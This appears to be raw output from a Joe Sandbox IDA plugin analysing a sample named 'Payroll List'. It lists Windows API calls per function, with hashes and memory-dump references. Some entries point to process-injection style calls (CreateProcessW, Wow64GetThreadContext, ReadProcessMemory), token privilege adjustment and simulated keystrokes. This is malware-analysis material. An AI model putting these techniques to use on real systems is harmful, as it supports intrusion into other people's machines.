                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                    • String ID:
                                                                    • API String ID: 1046115767-0
                                                                    • Opcode ID: 890cf4a9d5848a6f025ff78cf452ab07f3e00d43b0731d49fccc64b576279592
                                                                    • Instruction ID: 7fe2c0fb529384ec8afce877ae94d22ebb3598f2c1c1f4139a4db29c313e67b9
                                                                    • Opcode Fuzzy Hash: 890cf4a9d5848a6f025ff78cf452ab07f3e00d43b0731d49fccc64b576279592
                                                                    • Instruction Fuzzy Hash: AA11A1B2945A518AD712BFA8C88235C7AE1BF92335F3B4740E4255F1F3CBB48C4187A2
                                                                    APIs
                                                                      • Part of subcall function 0014395C: __FF_MSGBANNER.LIBCMT ref: 00143973
                                                                      • Part of subcall function 0014395C: __NMSG_WRITE.LIBCMT ref: 0014397A
                                                                      • Part of subcall function 0014395C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000001,00000000,?,?,0013F507,?,0000000E), ref: 0014399F
                                                                    • std::exception::exception.LIBCMT ref: 0013F51E
                                                                    • __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                      • Part of subcall function 00146805: RaiseException.KERNEL32(?,?,0000000E,001D6A30,?,?,?,0013F538,0000000E,001D6A30,?,00000001), ref: 00146856
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: 2305f7feb3954d00f499861871d334313e3e0e278802205834bd790a069b9130
                                                                    • Instruction ID: b8a554500bb86939a977facc705d6af72ffa9cc9da3a3ce18a71e6f6aaff226f
                                                                    • Opcode Fuzzy Hash: 2305f7feb3954d00f499861871d334313e3e0e278802205834bd790a069b9130
                                                                    • Instruction Fuzzy Hash: A7F0C83150421EA7D704BF98ED059DE77EC9F12358F60402AF909E21A1DBB0D64586A6
                                                                    APIs
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • __lock_file.LIBCMT ref: 00143629
                                                                      • Part of subcall function 00144E1C: __lock.LIBCMT ref: 00144E3F
                                                                    • __fclose_nolock.LIBCMT ref: 00143634
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: abc9a0194cd6e43622161498ff2f07f2331049e8aa93147b8b8640a1c761fff8
                                                                    • Instruction ID: 79f2dcd7f48e2012c11d85388520048a5c5afec0363afbe2dc8d0f1009ddd0e3
                                                                    • Opcode Fuzzy Hash: abc9a0194cd6e43622161498ff2f07f2331049e8aa93147b8b8640a1c761fff8
                                                                    • Instruction Fuzzy Hash: 2BF0B471901606AADB11BF7588027AE7AE06F62334F268109E435AB2F1CB7C8B019F56
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00D568C3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D56959
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D5697B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                    • Instruction ID: 26df43b1fdb525faa7dcc3f3fd390882d5531ae0c46178cc20735a5d6a8e0e81
                                                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                    • Instruction Fuzzy Hash: 8212EF20E14658C6EB24DF60D8507DEB232EF68301F1090E9950DEB7A5E77A8F85CF5A
                                                                    APIs
                                                                    • __flush.LIBCMT ref: 00142A0B
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __flush__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 4101623367-0
                                                                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                    • Instruction ID: b5d4c9b760c62e4a43c35d4bdfbd5a2ac20848b86f200ca1e6590a444489432d
                                                                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                    • Instruction Fuzzy Hash: CF41B3707007169FDB2C8EA9C8805AE7BA6AF84364B64852DF845C7660EBB0DDC18B40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: f660e22614b6652016532ca2abd5c7c05119ecb0ae5264ab32b96ff19233ce44
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 1B31D270A00205DBDB18DF98C480A69FBE6FF49350F6586A5E40ADB296DB31EDC1CB80
                                                                    APIs
                                                                      • Part of subcall function 00124214: FreeLibrary.KERNEL32(00000000,?), ref: 00124247
                                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001239FE,?,00000001), ref: 001241DB
                                                                      • Part of subcall function 00124291: FreeLibrary.KERNEL32(00000000), ref: 001242C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Free$Load
                                                                    • String ID:
                                                                    • API String ID: 2391024519-0
                                                                    • Opcode ID: 9b0a6b6330581d555f626c3a87a982574b91efdfb15fb738c4a793834d9cab99
                                                                    • Instruction ID: d3625a5215c087a788a97d70eccfb8d6d71d3969257c9efa5403f0ef2af821ae
                                                                    • Opcode Fuzzy Hash: 9b0a6b6330581d555f626c3a87a982574b91efdfb15fb738c4a793834d9cab99
                                                                    • Instruction Fuzzy Hash: BD11E331600226EBDF14FB75FC06F9E77E99F60700F108429F596AA1C1DB70DA619BA0
                                                                    APIs
                                                                    • ___lock_fhandle.LIBCMT ref: 0014AFC0
                                                                      • Part of subcall function 00147BDA: __getptd_noexit.LIBCMT ref: 00147BDA
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                                    • String ID:
                                                                    • API String ID: 1144279405-0
                                                                    • Opcode ID: 876a8bc02c8c96e76302933d049ce283e43adc6ac5c89c0bd9b21cdbf417d78e
                                                                    • Instruction ID: dfa9b4a6a13a4aaa73313e20a7ba18305ce431772e54987030083d989f2d7949
                                                                    • Opcode Fuzzy Hash: 876a8bc02c8c96e76302933d049ce283e43adc6ac5c89c0bd9b21cdbf417d78e
                                                                    • Instruction Fuzzy Hash: 2F118FB28096509BD7166FA4988276E3A60AFA2336F264640F4345F1F2C7B4CD419BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                    • Instruction ID: 27b466103edaeaea02f407d0bd5e795aca39228eb2c4fee3c63abd5f19f902b6
                                                                    • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                    • Instruction Fuzzy Hash: B1013131500119EFCF09EFA4D8928FEBB75AF20344F108069B566971A5EB309A59DBA0
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00142AED
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: 237780d24fea32e776ed3d2e5b937d82658011fbad59f11c7c9e4f2ae512f35d
                                                                    • Instruction ID: 477a3d6077ea328f4f991b0137c4912576e43119a4e5718fcd1c5fe014155c52
                                                                    • Opcode Fuzzy Hash: 237780d24fea32e776ed3d2e5b937d82658011fbad59f11c7c9e4f2ae512f35d
                                                                    • Instruction Fuzzy Hash: F8F09031A40205EBDF22AFB5CC067DF3AA5BF11324F658415F814AB1B1D7788A92DB52
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,001239FE,?,00000001), ref: 00124286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 06a664b31fd0a6f8e5cb3f3df7d5243748a14b2a8a3304aebc40173960311b2b
                                                                    • Instruction ID: f0de3ff78e61ceb47879ef75b4c40fb2054bb677265b5fe53ec1e444ad90a230
                                                                    • Opcode Fuzzy Hash: 06a664b31fd0a6f8e5cb3f3df7d5243748a14b2a8a3304aebc40173960311b2b
                                                                    • Instruction Fuzzy Hash: 0CF01571505722CFCB389F66F890826BBE4AF143253258A2EF1D686A20C7729890DB50
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001240C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath
                                                                    • String ID:
                                                                    • API String ID: 82841172-0
                                                                    • Opcode ID: 48f4882186a31bbee81e269378c63c83a4c8a1d429d412d11e4bb5ff011fe78d
                                                                    • Instruction ID: 36c4703ad70e1d91b3f555b60f98f4e0c79e1bcc834d7a5bc79ec37da1a302fa
                                                                    • Opcode Fuzzy Hash: 48f4882186a31bbee81e269378c63c83a4c8a1d429d412d11e4bb5ff011fe78d
                                                                    • Instruction Fuzzy Hash: E8E0C236A002245BCB11A658DC46FEA77ADDFCC6A0F0900B5F909E7254DA64ADC18690
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 00D57119
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 9cdb5c319bcf7ce42890f9bf4d30ab7dcfd89df1741735574831e46b0cff907b
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: EEE0E67494520DDFDB00DFB8D5496AD7BF4EF04302F1001A1FD01D2280D6309D508A72
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0018F87D
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0018F8DC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0018F919
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0018F940
                                                                    • SendMessageW.USER32 ref: 0018F966
                                                                    • _wcsncpy.LIBCMT ref: 0018F9D2
                                                                    • GetKeyState.USER32(00000011), ref: 0018F9F3
                                                                    • GetKeyState.USER32(00000009), ref: 0018FA00
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0018FA16
                                                                    • GetKeyState.USER32(00000010), ref: 0018FA20
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0018FA4F
                                                                    • SendMessageW.USER32 ref: 0018FA72
                                                                    • SendMessageW.USER32(?,00001030,?,0018E059), ref: 0018FB6F
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0018FB85
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0018FB96
                                                                    • SetCapture.USER32(?), ref: 0018FB9F
                                                                    • ClientToScreen.USER32(?,?), ref: 0018FC03
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0018FC0F
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0018FC29
                                                                    • ReleaseCapture.USER32 ref: 0018FC34
                                                                    • GetCursorPos.USER32(?), ref: 0018FC69
                                                                    • ScreenToClient.USER32(?,?), ref: 0018FC76
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0018FCD8
                                                                    • SendMessageW.USER32 ref: 0018FD02
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0018FD41
                                                                    • SendMessageW.USER32 ref: 0018FD6C
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0018FD84
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0018FD8F
                                                                    • GetCursorPos.USER32(?), ref: 0018FDB0
                                                                    • ScreenToClient.USER32(?,?), ref: 0018FDBD
                                                                    • GetParent.USER32(?), ref: 0018FDD9
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0018FE3F
                                                                    • SendMessageW.USER32 ref: 0018FE6F
                                                                    • ClientToScreen.USER32(?,?), ref: 0018FEC5
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0018FEF1
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0018FF19
                                                                    • SendMessageW.USER32 ref: 0018FF3C
                                                                    • ClientToScreen.USER32(?,?), ref: 0018FF86
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0018FFB6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0019004B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 2516578528-4164748364
                                                                    • Opcode ID: f0312e081680cd647b04e1490c13d2e86ca3fa343f02c6148c3a3e7d6ed93e4a
                                                                    • Instruction ID: 1d89afea2cf196a81438231a3f749db5e3577600418815801d02c4416077de71
                                                                    • Opcode Fuzzy Hash: f0312e081680cd647b04e1490c13d2e86ca3fa343f02c6148c3a3e7d6ed93e4a
                                                                    • Instruction Fuzzy Hash: E432CE70604344AFDB10EFA4C884BAABBA5FF4A354F04062DF659872A1D770DEA2CF51
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0018B1CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 3850602802-328681919
                                                                    • Opcode ID: fd544a12bfd50faa866ed9a782b735414845f038a07f92a2b140d523e47d8d2a
                                                                    • Instruction ID: 3911de5e1418f99563cf9a98289ea715654a6f74da3cc69f19892884b9097a2f
                                                                    • Opcode Fuzzy Hash: fd544a12bfd50faa866ed9a782b735414845f038a07f92a2b140d523e47d8d2a
                                                                    • Instruction Fuzzy Hash: 0D12E071504218ABEB29AF64EC89FAE7BB8FF45310F14411AF91ADB2D1DB709A41CF11
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0013EB4A
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00193AEA
                                                                    • IsIconic.USER32(000000FF), ref: 00193AF3
                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 00193B00
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00193B0A
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00193B20
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00193B27
                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00193B33
                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00193B44
                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00193B4C
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00193B54
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00193B57
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B6C
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193B77
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B81
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193B86
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B8F
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193B94
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B9E
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193BA3
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00193BA6
                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00193BCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: 1e616c7e0ecdf3735558a090334041e8b0ba9349a428aabf629e1698202ed758
                                                                    • Instruction ID: 78a636e31087184615436f559b0710bcbffe179a9cf4e4bc77e9ba095f61976a
                                                                    • Opcode Fuzzy Hash: 1e616c7e0ecdf3735558a090334041e8b0ba9349a428aabf629e1698202ed758
                                                                    • Instruction Fuzzy Hash: 3E31A4B1A40318BBEF306BA59C49F7F7E7CEB45B50F114015FA06EA5D1D7B05D40AAA0
                                                                    APIs
                                                                      • Part of subcall function 0015B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
                                                                      • Part of subcall function 0015B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
                                                                      • Part of subcall function 0015B134: GetLastError.KERNEL32 ref: 0015B1BA
                                                                    • _memset.LIBCMT ref: 0015AD08
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0015AD5A
                                                                    • CloseHandle.KERNEL32(?), ref: 0015AD6B
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0015AD82
                                                                    • GetProcessWindowStation.USER32 ref: 0015AD9B
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 0015ADA5
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0015ADBF
                                                                      • Part of subcall function 0015AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0015ACC0), ref: 0015AB99
                                                                      • Part of subcall function 0015AB84: CloseHandle.KERNEL32(?,?,0015ACC0), ref: 0015ABAB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
